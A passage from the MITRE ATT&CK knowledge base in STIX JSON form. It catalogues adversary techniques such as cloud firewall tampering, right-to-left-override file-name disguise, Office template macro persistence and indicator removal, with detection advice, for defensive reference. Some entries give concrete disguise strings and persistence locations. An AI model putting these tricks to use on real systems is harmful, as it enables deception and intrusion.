"2017-05-31T21:30:29.458Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1020", "external_id": "T1020"}, {"source_name": "ESET Gamaredon June 2020", "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.", "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Client Configurations", "description": "Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c", "created": "2020-10-02T16:47:16.719Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1592/004", "external_id": "T1592.004"}, {"source_name": "ATT ScanBox", "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks"}, {"source_name": "ThreatConnect Infrastructure Dec 2020", "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-04-15T00:25:36.502Z", "name": "Disable or Modify Cloud Firewall", "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Expel"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor cloud logs for modification or creation of new security groups or firewall rules.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c", "created": "2020-06-24T16:55:46.243Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1562/007", "external_id": "T1562.007"}, {"source_name": "Expel IO Evil in AWS", "description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.", "url": "https://expel.io/blog/finding-evil-in-aws/"}, {"source_name": "Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022", "description": "Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.", "url": "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-08T18:54:40.925Z", "name": "Autorun Image", "description": "Adversaries may leverage AutoRun functionality or scripts to execute malicious code. Devices configured to enable AutoRun functionality or legacy operating systems may be susceptible to abuse of these features to run malicious code stored on various forms of removeable media (i.e., USB, Disk Images [.ISO]). Commonly, AutoRun or AutoPlay are disabled in many operating systems configurations to mitigate against this technique. If a device is configured to enable AutoRun or AutoPlay, adversaries may execute code on the device by mounting the removable media to the device, either through physical or virtual means. This may be especially relevant for virtual machine environments where disk images may be dynamically mapped to a guest system on a hypervisor. \n\nAn example could include an adversary gaining access to a hypervisor through the management interface to modify a virtual machine\u2019s hardware configuration. They could then deploy an iso image with a malicious AutoRun script to cause the virtual machine to automatically execute the code contained on the disk image. This would enable the execution of malicious code within a virtual machine without needing any prior remote access to that system.\n", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_data_sources": ["Drive: Drive Creation", "Process: Process Creation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", "created": "2024-03-26T15:39:19.473Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0895", "external_id": "T0895"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_platforms": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Right-to-Left Override", "description": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO Technique)\n\nAdversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Detection methods should include looking for common formats of RTLO characters within filenames such as \\u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", "created": "2020-02-10T19:55:29.385Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1036/002", "external_id": "T1036.002"}, {"source_name": "Infosecinstitute RTLO Technique", "description": "Security Ninja. (2015, April 16). Spoof Using Right to Left Override (RTLO) Technique. Retrieved April 22, 2019.", "url": "https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/"}, {"source_name": "Trend Micro PLEAD RTLO", "description": "Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/"}, {"source_name": "Kaspersky RTLO Cyber Crime", "description": "Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram - Cybercriminals exploited Telegram flaw to launch multipurpose attacks. Retrieved April 22, 2019.", "url": "https://securelist.com/zero-day-vulnerability-in-telegram/83800/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Malware", "description": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.\n\nIn addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970", "created": "2020-10-01T02:06:11.499Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1588/001", "external_id": "T1588.001"}, {"source_name": "FireEyeSupplyChain", "description": "FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017.", "url": "https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:06.780Z", "name": "Drive-by Compromise", "description": "Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session. With this technique, the user's web browser is targeted and exploited simply by visiting the compromised website. \n\nThe adversary may target a specific community, such as trusted third party suppliers or other industry specific groups, which often visit the target website. This kind of targeted attack relies on a common interest, and is known as a strategic web compromise or watering hole attack. \n\nThe National Cyber Awareness System (NCAS) has issued a Technical Alert (TA) regarding Russian government cyber activity targeting critical infrastructure sectors. (Citation: Cybersecurity & Infrastructure Security Agency March 2018) Analysis by DHS and FBI has noted two distinct categories of victims in the Dragonfly campaign on the Western energy sector: staging and intended targets. The adversary targeted the less secure networks of staging targets, including trusted third-party suppliers and related peripheral organizations. Initial access to the intended targets used watering hole attacks to target process control, ICS, and critical infrastructure related trade publications and informational websites.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Network Traffic: Network Traffic Content", "Application Log: Application Log Content", "Process: Process Creation", "File: File Creation", "Network Traffic: Network Connection Creation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0817", "external_id": "T0817"}, {"source_name": "Cybersecurity & Infrastructure Security Agency March 2018", "description": "Cybersecurity & Infrastructure Security Agency 2018, March 15 Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2019/10/11 ", "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-074A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Component Firmware", "description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\n\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) disk monitoring may reveal malicious manipulations of components.(Citation: SanDisk SMART)(Citation: SmartMontools) Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014) Also consider comparing components, including hashes of component firmware and behavior, against known good images.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Host intrusion prevention systems", "File monitoring"], "x_mitre_permissions_required": ["SYSTEM"], "x_mitre_system_requirements": ["Ability to update component device firmware from the host operating system."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", "created": "2019-12-19T20:21:21.669Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1542/002", "external_id": "T1542.002"}, {"source_name": "SanDisk SMART", "description": "SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.). Retrieved October 2, 2018."}, {"source_name": "SmartMontools", "description": "smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018.", "url": "https://www.smartmontools.org/"}, {"source_name": "ITWorld Hard Disk Health Dec 2014", "description": "Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018.", "url": "https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Indicator Removal", "description": "Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary\u2019s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.\n\nRemoval of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Brad Geesaman, @bradgeesaman", "Ed Williams, Trustwave, SpiderLabs", "Blake Strom, Microsoft 365 Defender"], "x_mitre_deprecated": false, "x_mitre_detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system may require different detection mechanisms.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Containers", "Network", "Office 365", "Google Workspace"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Log analysis", "Host intrusion prevention systems", "Anti-virus"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "created": "2017-05-31T21:30:55.892Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1070", "external_id": "T1070"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Exfiltration Over Symmetric Encrypted Non-C2 Protocol", "description": "Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nSymmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. \n\nNetwork protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) \n\nArtifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", "created": "2020-03-15T15:30:42.378Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1048/001", "external_id": "T1048.001"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Office Template Macros", "description": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21", "created": "2019-11-07T20:29:17.788Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1137/001", "external_id": "T1137.001"}, {"source_name": "Microsoft Change Normal Template", "description": "Microsoft. (n.d.). Change the Normal template (Normal.dotm). Retrieved July 3, 2017.", "url": "https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea"}, {"source_name": "MSDN VBA in Office", "description": "Austin, J. (2017, June 6). Getting Started with VBA in Office. Retrieved July 3, 2017.", "url": "https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office"}, {"source_name": "enigma0x3 normal.dotm", "description": "Nelson, M. (2014, January 23). Maintaining Access with normal.dotm. Retrieved July 3, 2017.", "url": "https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/"}, {"source_name": "Hexacorn Office Template Macros", "description": "Hexacorn. (2017, April 17). Beyond good ol\u2019 Run key, Part 62. Retrieved July 3, 2017.", "url": "http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/"}, {"source_name": "GlobalDotName Jun 2019", "description": "Shukrun, S. (2019, June 2). Office Templates and GlobalDotName - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.", "url": "https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique"}, {"source_name": "CrowdStrike Outlook Forms", "description": "Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral Movement and Persistence. Retrieved February 5, 2019.", "url": "https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746"}, {"source_name": "Outlook Today Home Page", "description": "Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019.", "url": "https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Virtual Private Server", "description": "Adversaries may rent Virtual Private Servers (VPSs)\u00a0that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.\n\nAcquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795", "created": "2020-10-01T00:44:23.935Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1583/003", "external_id": "T1583.003"}, {"source_name": "TrendmicroHideoutsLease", "description": "Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.", "url": "https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf"}, {"source_name": "ThreatConnect Infrastructure Dec 2020", "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"}, {"source_name": "Mandiant SCANdalous Jul 2020", "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", "url": "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation"}, {"source_name": "Koczwara Beacon Hunting Sep 2021", "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Confluence", "description": "\nAdversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal 